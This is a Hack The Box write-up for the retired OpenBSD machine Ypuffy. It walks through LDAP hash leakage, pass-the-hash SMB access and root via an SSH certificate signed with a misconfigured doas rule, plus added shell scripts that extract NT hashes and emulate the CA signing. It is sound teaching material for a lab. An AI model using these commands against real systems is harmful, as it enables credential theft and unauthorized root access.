# Hack The Box - Ypuffy

## Quick Summary

Hey guys, today Ypuffy retired and this is my write-up. This box is a little different from the other boxes: it's not Windows or Linux, it's running OpenBSD, which is a Unix-like system. I really liked the privilege escalation in this box because it had some cool SSH stuff. Without talking too much, let's jump right in. It's a medium difficulty box and its IP is 10.10.10.107; I added it to /etc/hosts as ypuffy.htb.

## Nmap

nmap -sV -sT -sC ypuffy.htb

Nmap tells us that there's SSH running on port 22, HTTP on port 80, SMB on ports 139 and 445, and LDAP on port 389.
It also tells us that the LDAP server accepts anonymous binds.

## Initial Enumeration

Let's check HTTP first.

Connection reset. HTTP will be useful later, but not now.
Moving on to the next thing, we have SMB. Let's see if a null session lets us enumerate the shares. We will use smbmap:
smbmap -H ypuffy.htb

Let's check LDAP.

## LDAP

nmap told us that anonymous binds are allowed, so we will use ldapsearch with a simple bind and no credentials (-x), searching from the base DN:
ldapsearch -h 10.10.10.107 -p 389 -x -b dc=hackthebox,dc=htb
(Newer OpenLDAP builds deprecate -h/-p in favour of -H ldap://10.10.10.107.)
Full Output :

We can also use nmap to enumerate LDAP with the ldap-search script:
nmap -p 389 --script ldap-search ypuffy.htb
Full Output:

The most interesting part is this :

We get a username, alice1978, and an NT password hash, 0B186E661BBDBDCF6047784DE8B9FD8B, stored in the directory for Samba.
This hash didn't crack, but we don't need the cleartext: an NT hash can be used directly to authenticate to SMB (pass-the-hash).
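As an added example (not part of the original write-up), here is a small shell helper that pulls username and NT-hash pairs out of LDIF, so the result can go straight into crackmapexec or smbclient instead of being copied from a screenshot. The LDIF below is constructed to mirror what the box returns; sambaNTPassword is the attribute name Samba's LDAP schema uses for the NT hash, and the wrapped line imitates ldapsearch's default 78-column folding.

```shell
#!/bin/sh
# Added example, not from the write-up: extract "uid hash" pairs from LDIF.
# Handles LDIF continuation lines (a leading space joins to the previous line).
# Base64 attributes ("attr:: value") are not decoded; none of the fields we need
# come back base64-encoded from this box.

# Constructed sample of what `ldapsearch -x -b dc=hackthebox,dc=htb` returns.
sample_ldif() {
  cat <<'EOF'
dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
objectClass: sambaSamAccount
uid: alice1978
sambaNTPassword: 0B186E661BBDBDCF60
 47784DE8B9FD8B

dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
uid: bob8791
EOF
}

# Reads LDIF on stdin, prints "uid hash" for every entry carrying sambaNTPassword.
extract_nt_hashes() {
  awk '
    BEGIN { RS = ""; FS = "\n" }          # one LDIF entry per record
    function take(line) {
      if (line ~ /^uid: /)                  uid  = substr(line, 6)
      else if (line ~ /^sambaNTPassword: /) hash = substr(line, 18)
    }
    {
      uid = ""; hash = ""; cur = ""
      for (i = 1; i <= NF; i++) {
        if ($i ~ /^ /) { cur = cur substr($i, 2); continue }   # continuation line
        if (cur != "") take(cur)
        cur = $i
      }
      if (cur != "") take(cur)
      if (uid != "" && hash != "") print uid, hash
    }'
}

# Against the real target the same function sits at the end of a pipe, e.g.:
#   ldapsearch -x -H ldap://ypuffy.htb -b dc=hackthebox,dc=htb \
#       '(sambaNTPassword=*)' uid sambaNTPassword | extract_nt_hashes
# (-o ldif-wrap=no would also stop ldapsearch folding long lines.)
sample_ldif | extract_nt_hashes
```

The output line, `alice1978 0B186E661BBDBDCF6047784DE8B9FD8B`, is already in the form `-u user -H hash` expects, and the filter `(sambaNTPassword=*)` keeps the real query down to accounts that actually carry a hash.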

## SMB Enumeration

We need to list the shares first to know where we can connect. We can use crackmapexec, passing the NT hash with -H instead of a password:
crackmapexec ypuffy.htb -u alice1978 -H 0B186E661BBDBDCF6047784DE8B9FD8B --shares

There are only two shares, alice and IPC$; we have read and write access to alice and no access to IPC$.
We can also use smbclient to list the shares (--pw-nt-hash tells it the value after % is an NT hash, not a password):
smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash -L //ypuffy.htb/

But it doesn't tell us which shares we can access and which we can't.
So we know that we can access the share alice, let's connect.
smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash //ypuffy.htb/alice

There's only one file, my_private_key.ppk; get my_private_key.ppk downloads it.

## SSH and getting user

my_private_key.ppk is a PuTTY private key; OpenSSH won't load that format, so we need to convert it to an OpenSSH private key before we can ssh with it.
On Kali I had to get putty-tools first
apt-get install putty-tools
Then we will use puttygen (-O private-openssh selects the output format, -o the output file):
puttygen my_private_key.ppk -O private-openssh -o alice.key
Now let's take a look at the key:

Last step is chmod 600 alice.key (ssh refuses private keys that other users can read) and finally ssh
ssh -i alice.key alice1978@ypuffy.htb

And we owned user !

## More Enumeration

Remember HTTP? We got a connection reset. Let's check the httpd config in /etc/httpd.conf

Two things stand out: location "/userca*" and location "/sshauth*".
After some more enumeration, there are 3 users on the box:

alice1978, bob8791 and userca
bob8791 has a directory called dba

Inside it there's an SQL file called sshauth.sql

It creates a table called principals and another table called keys.
If we also check sshd_config in /etc/ssh/

This part:

So that HTTP service backs SSH authentication: sshd_config uses AuthorizedKeysCommand and AuthorizedPrincipalsCommand to ask the web service for a user's keys and principals instead of reading an authorized_keys file. From our shell on the box we can query it ourselves: /sshauth?type=keys&username= returns keys and /sshauth?type=principals&username= returns principals. Requesting keys for root gives us no response, but requesting root's principals gives us 3m3rgencyB4ckd00r. That matters because, when sshd trusts a CA, it accepts a certificate for a login name if one of the certificate's principals matches a principal returned for that name. Root has no plain key on record, but any certificate carrying the principal 3m3rgencyB4ckd00r and signed by the trusted CA will do.

## Generating and signing ssh keys , Getting root

So now we have root's principal, 3m3rgencyB4ckd00r. The plan: generate a key pair, have the CA that sshd trusts sign the public key into a certificate whose principal list contains 3m3rgencyB4ckd00r, and ssh as root with it.
The problem is that the CA's private key belongs to userca, so as alice1978 we can't use it directly. On Linux we would check for elevated commands with sudo -l, but there's no sudo here; OpenBSD uses doas instead. Its config file, /etc/doas.conf, shows:

We can run /usr/bin/ssh-keygen as userca without a password, and ssh-keygen is exactly the tool that signs certificates.
First step is to create a key pair for alice1978 (the private key stays ours; only the public half gets signed):
ssh-keygen -t rsa -f /tmp/id_rsa

The CA private key, ca, lives in /home/userca/, so we cd there (the path given to -s is relative):

Then sign the public key as userca, with key ID root and principal 3m3rgencyB4ckd00r:
doas -u userca /usr/bin/ssh-keygen -s ca -I root -n 3m3rgencyB4ckd00r /tmp/id_rsa.pub

This writes the certificate to /tmp/id_rsa-cert.pub. (ssh-keygen also accepts the private-key path, /tmp/id_rsa, and looks up the matching .pub itself, so running it against /tmp/id_rsa produces the same file; one signing is enough.)
-s is the CA key to sign with, -I the certificate's key ID (it shows up in sshd's log), -n the principal list. Before using it, check the certificate with ssh-keygen -L -f /tmp/id_rsa-cert.pub: the Principals section must list 3m3rgencyB4ckd00r.
Finally we will ssh as root; ssh picks up /tmp/id_rsa-cert.pub automatically because it sits next to the private key:
ssh -i /tmp/id_rsa root@localhost

And we owned root !
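As an added example covering both the sshauth/sshd_config explanation above and the signing step, here is a shell script (mine, not the write-up's or the box's code) that emulates the principals lookup sshd performs, reproduces the doas/ssh-keygen signing against a throwaway CA, and then applies the same accept/reject rule sshd uses. The one-row principals table is constructed for the demo and its two-column layout is an assumption; the real box stores it in the SQL tables from sshauth.sql and serves it over /sshauth.

```shell
#!/bin/sh
# Added example, not from the original write-up: emulate the principals lookup
# behind /sshauth, sign a user key with a CA, and check the certificate the way
# sshd's AuthorizedPrincipalsCommand path would.
set -u

# Constructed stand-in for the `principals` table from sshauth.sql.
# The (login name, principal) layout is an assumption for this demo.
principals_table() {
  cat <<'EOF'
root 3m3rgencyB4ckd00r
EOF
}

# What AuthorizedPrincipalsCommand (the /sshauth?type=principals&username= call)
# hands back to sshd: one principal per line for the login name in $1.
lookup_principals() {
  principals_table | awk -v u="$1" '$1 == u { print $2 }'
}

# The doas step: sign a user public key with the CA private key.
# $1 = CA private key  $2 = user public key  $3 = key ID (-I)  $4 = principal(s) (-n)
# The certificate lands next to $2 as <name>-cert.pub.
sign_user_key() {
  ssh-keygen -q -s "$1" -I "$3" -n "$4" "$2"
}

# Read the principals back out of a certificate (the check to run before using it).
cert_principals() {
  ssh-keygen -L -f "$1" | awk '
    /Principals:/       { grab = 1; next }
    /Critical Options:/ { grab = 0 }
    grab                { sub(/^[ \t]+/, ""); print }'
}

# sshd's rule: accept the certificate for login name $1 when at least one of its
# principals matches a line returned for that name. (sshd also requires the
# signing CA to be listed in TrustedUserCAKeys, which this demo does not model.)
cert_accepted() {
  for p in $(cert_principals "$2"); do
    lookup_principals "$1" | grep -qx -- "$p" && return 0
  done
  return 1
}

demo() {
  command -v ssh-keygen >/dev/null 2>&1 || { echo "ssh-keygen not installed" >&2; return 2; }
  work=$(mktemp -d) || return 1
  # Throwaway CA; on the box this is /home/userca/ca, usable only by userca.
  ssh-keygen -q -t ed25519 -N '' -f "$work/ca" -C 'demo CA'
  # The user key pair, like `ssh-keygen -t rsa -f /tmp/id_rsa` in the write-up.
  ssh-keygen -q -t ed25519 -N '' -f "$work/id" -C 'demo user'
  principal=$(lookup_principals root)
  sign_user_key "$work/ca" "$work/id.pub" root "$principal"
  cert_principals "$work/id-cert.pub"
  for user in root alice1978; do
    if cert_accepted "$user" "$work/id-cert.pub"; then
      echo "$user: accepted"
    else
      echo "$user: rejected"
    fi
  done
  rm -rf "$work"
}

demo
```

The certificate is accepted for root and rejected for alice1978 even though it is the same file: the decision is driven entirely by which principals the lookup returns for the login name, which is why a single leaked principal string plus access to the CA key was enough on this box.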

That’s it , Feedback is appreciated !